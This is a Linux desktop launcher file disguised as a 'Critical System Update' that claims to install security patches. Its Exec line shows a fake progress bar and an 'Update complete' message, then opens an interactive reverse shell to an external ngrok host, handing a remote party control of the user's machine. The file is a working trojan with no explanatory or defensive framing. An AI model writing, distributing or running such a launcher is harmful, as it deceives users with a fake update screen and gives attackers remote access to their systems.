[Desktop Entry]
Name=Critical System Update
Comment=Install important security patches
Exec=bash -c 'echo "[*] Applying security patches..."; for i in {1..20}; do printf "#"; sleep 0.3; done; echo -e "\n[*] Update complete."; bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19931 0>&1; sleep 0.5;'
Icon=system-software-update
Terminal=true
Type=Application
Categories=System;

